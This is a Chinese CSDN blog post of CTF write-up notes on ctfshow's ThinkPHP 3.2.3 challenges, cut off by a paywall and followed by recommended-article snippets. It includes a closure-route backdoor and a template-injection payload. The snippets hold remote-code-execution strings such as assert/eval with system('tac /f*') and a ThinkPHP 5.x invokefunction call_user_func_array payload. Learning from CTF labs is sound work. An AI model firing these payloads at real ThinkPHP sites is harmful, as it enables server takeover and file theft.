ctfshow- thinkphp专题笔记一

最新推荐文章于 2023-06-02 14:01:24 发布
最新推荐文章于 2023-06-02 14:01:24 发布
阅读量761 收藏 1
点赞数
文章标签: python 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zxt2804567059/article/details/121449524
版权
这篇博客详细记录了ThinkPHP 3.2.x版本中的多个安全漏洞,包括pathinfo利用、闭包路由后门、show方法引发的命令执行、debug模式下的日志文件泄露、SQL注入问题以及反序列化POP链等,通过实例演示了攻击者可能利用的payload和漏洞原理。
摘要由CSDN通过智能技术生成

TP3.23完全开发手册

thinkphp3.23

web569(pathinfo的运用)

在这里插入图片描述TP3.2.3开发手册-URL模式
入口文件是应用的单一入口,对应用的所有请求都定向到应用入口文件,系统会从URL参数中解析当前请求的模块、控制器和操作:

http://serverName/index.php/模块/控制器/操作

payload:

http://serverName/index.php/Admin/Login/ctfshowLogin

web570(闭包路由后门)

在这里插入图片描述
审计提供的Application文件
在这里插入图片描述这里详情TP3.2.3开发手册-闭包支持

    'ctfshow/:f/:a' =>function($f,$a){
   
    	call_user_func($f, $a);
    	}
    )
);

在这里插入图片描述

web571(show方法导致的命令执行)

看了师傅们写的wp自己测试了下
将附件的Application替代thinkphp3.23里面的Application
先看下效果
在这里插入图片描述接下来就是找下原理
我们要分析一下show这个函数的走向,在vscode上下断点
在这里插入图片描述

然后访问

http://127.0.0.1/thinkphp3.23/index.php/Home/Index/index?n=<?php phpinfo();?>

我们传的参数n是content变量
先进入show函数->display函数->fetch函数->eval函数执行content

最低0.47元/天 解锁文章
{Yasso}
关注
ctfshowThinkphp
灰太的表格的博客
08-24 229
web569 web570 /index.php/Home/ctfshow/assert/eval($_GET[1])/?1=system("tac%20/f*"); 闭包路由:参考官方文档或博客 web571 给了源码,找到一处可以进行传参的控制器,传个参数在这,打个断点调下: 接着跟进去: 接着跟进: 我们最开始传的参数在content变量里,跟进到if(这里有个对于当前使用的一个模板的判断,由于不知道题目使用的是哪种所以我就用0,1了图方便): 往下走: 成功找到后门,conten
ctfshow ThinkPHP篇573
羽的博客
08-05 880
web573 thinkphp 3.2.3sql注入漏洞 源代码 class IndexController extends Controller { public function index(){ $a=M('xxx'); //表名 $id=I('GET.id'); $b=$a->find($id); var_dump($b); } } 来调试一下看为什么普通的注入不行。本地sql表内数据如下。 传入?id=1' 首先在I函数里面有个过滤,调用
ctfshow ThinkPHP篇575
羽的博客
08-05 806
web575 给了源码 $user= unserialize(base64_decode(cookie('user'))); if(!$user || $user->id!==$id){ $user = M('Users'); $user->find(intval($id)); cookie('user',base64_encode(serialize($user->data()))); } $this->show($user->username); } 首先引起注意的
ThinkPHP 5.X版本网页提权测试(CTF常见题型)
D1FFERENT的博客
10-18 788
ThinkPHP 5.X版本网页提权测试 首先靶机地址http://192.168.1.111 登录 发现版本是thinkphp 5.X版本 果断kali进行搜索tinkphp拼接漏洞 CD到5.X目录下 查看文件 46150.txt 选用一条常用命令 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd 进行url的index.php后拼接
Ctfshow web入门 thinkphp专题
feng的博客
04-25 3481
web569 看一下thinkphp3.2.3官方手册,看完就都懂了: ThinkPHP3.2.3完全开发手册 首先就是路由的方式: http://serverName/index.php/模块/控制器/操作 此外就是默认是不区分大小写的,由'URL_CASE_INSENSITIVE' => true,这个配置决定。 URL模式的话,默认是PATHINFO模式,即本题考察的模式。 直接访问即可: /index.php/admin/login/ctfshowlogin web570 下载源码,在C
WebStackPage-ThinkPHP5:WebStackPage-ThinkPHP5由
03-13
是一个免费开源的导航项目初步WebStackPageDevelop最早基于ThinkPHP5Develop 用户可以在后台自定义添加分类菜单 用户可以在后台添加书签链接及图片 一键设置前端显示的站点信息/ Logo等 目前处于开发阶段,现有的...
thinkphp多用户在线客服系统源码-thinkPHP内核 附使用教程
06-01
步骤 1 请使用宝塔面板安装 上传源码并且解压到网站很目录 设置运行目录为public 测试环境为php5.6 mysql5.5 伪静态选择为thinkphp 宝塔 安全 放通: 2080 , 9090 这两个端口 步骤2 上方操作完毕后 创建...
拍卖网pc-wap-thinkphp源码.rar
01-08
《深入解析ThinkPHP框架在拍卖网站开发中的应用》 在当今互联网时代,拍卖网站作为一种独特的商业模式,为用户提供了一个在线竞拍商品的平台。本资源"拍卖网pc-wap-thinkphp源码.rar"正是基于这样的需求,采用...
MAC可视化-shiro-struts2-weblogic-thinkphp-oa等一键利用漏洞-仅供测试使用,后果自行负责。
02-14
仅供测试使用,后果自行负责。
ctfshow web入门(thinkphp专题)
qq_53263789的博客
02-09 798
569 URL模式 查阅手册:URL模式 · ThinkPHP3.2.3完全开发手册 http://serverName/index.php/模块/控制器/操作 payload: 普通模式:/?m=Admin&c=Login&a=ctfshowLogin Pathinfo模式:/index.php/Admin/Login/ctfshowLogin 兼容模式:/?s=/Admin/Login/ctfshowLogin 570 路由 发现路由: 根据手册: 直接构造:这里直接执行不可以
ctfshow ThinkPHP篇—3.2.3(569-578)
羽的博客
08-05 1919
文章目录web569相关内容题解web570web571web572web573web574web575web576web577web578 web569 相关内容 参考thinkphp手册 为了访问下图中的index方法并输出hello 123我们可以通过下面四种模式。 PATHINFO模式 http://localhost/index.php/Home/Index/index/name/123/ 普通模式 http://localhost/index.php?m=Home&c=Index&a
ctfshow thinkphp专题
qq_50589021的博客
10-13 776
前言 跟进一步增强php的代码审计能力,了解tp框架 从最基础的开始学习,目的不是为了一把梭,而是要明白它的原理和设计思路,为我们以后自主调试挖洞打下基础 web569——路由 本题使用的版本为3.2.3 ThinkPHP3.2.3完全开发手册-架构-URL模式 入口文件是应用的单一入口,对应用的所有请求都定向到应用入口文件,系统会从URL参数中解析当前请求的模块、控制器和操作: http://serverName/index.php/模块/控制器/操作 这是3.2版本的标准URL格式。 payload
ctfshow终极考核wp
Lum1n0us's Blog
01-17 3751
文章目录web640web641web642web643web644web645web646 web640 打开页面就能看到flag ctfshow{060ae7a27d203604baeb125f939570ef} web641 抓取首页的包,看到有一个Flag字段 ctfshow{affac61c787a82cc396585bea8ecf2dc} web642 在上面包里的源码看到css路径不寻常/system36d/static/css/start.css,在url后添加/system36d,抓包
ctfshow_ThinkPHP专题
qq_45951598的博客
07-02 420
web569-- 路由 打开页面是这样的 这里的话推荐想看一下3.2.3的开发手册,网站地址是ThinkPHP3.2.3完全开发手册 不想看的,我就简单的截取一张图片来看一下 PATHINFO模式下面的URL访问地址是: http://localhost/index.php/home/user/login/var/value/ 然后根据提示直接构造就是了 payload:http://1a941035-d87a-4eea-9068-77062fa67c57.challenge.ctf.show:80
CTFShow-WEB入门篇--信息搜集详细Wp
Aluxian_的博客
06-02 2655
CTFShow-WEB入门篇--信息搜集详细Wp
CTFshow——thinkphp专题
D.MIND 的博客
06-12 1775
570——闭包路由 关注这段代码:这是闭包路由的用法,官方:手册闭包支持 我们用phpinfo()函数测试一下:是可以的 /index.php/ctfshow/phpinfo/1 注意因为eval是一个语言结构而不是函数,所以这里是不能被call_user_func调用的,而assert是一个函数。因此我想到了assert(system("ls"));,但在尝试ls /时却不行了,很迷。 然后我想着参数转移一下。然后下意识构造出这样: /index.php/ctfshow/assert/$_POST[1
CTFShow web1-7——CTF秀WEB模块解题思路
热门推荐
wangyuxiang946的博客
09-15 1万+
CTFShow WEB模块详细通关教程, 受篇幅所限, 通关教程分为上下两部分, 第一部分为1-7关, 第二部分为8-14关, 本篇博客为1-7关的通关教程, 从解题思路和所用到的知识点两个方面进行讲解 CTFShow web1-7关详细教程解题思路CTFShow web签到题CTFShow web2CTFShow web3CTFShow web4CTFShow web5CTFShow web6CTFShow web7知识点php://input伪协议日志注入MD5加密漏洞-0e绕过过滤空格的绕过方式 .
poc-yaml-thinkphp5023-method-rce poc1
最新发布
07-29
poc-yaml-thinkphp5023-method-rce poc1 是一种潜在的安全漏洞利用程序,利用该程序可以对使用 ThinkPHP 5.0.23 版本的应用进行远程代码执行攻击。 ThinkPHP 是一款常用的 PHP 框架,版本 5.0.23 存在一个命令行解析漏洞,攻击者可以利用该漏洞在服务器上执行任意命令。poc-yaml-thinkphp5023-method-rce 是一个利用该漏洞的示例程序。 通过 poc1 工具,攻击者可以利用 YAML 文件解析的漏洞,实现远程代码执行。攻击者通过构造恶意 YAML 文件,并将其作为参数发送给目标应用的接口,从而触发代码执行。 该漏洞的危害性很高,攻击者可以在受影响的应用上执行任意命令,例如查看、修改或删除敏感文件,创建新用户账户,获取数据库信息等。这可能导致严重的安全风险和数据泄露。 为了防止此漏洞的利用,建议使用 ThinkPHP 的最新版本,并及时更新框架。此外,应开启严格的访问控制,限制对敏感函数和文件的访问。同时,将任何用户输入数据进行严格过滤和验证,以防止注入攻击。最重要的是,及时关注和安装安全补丁,保持应用程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

{Yasso}

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值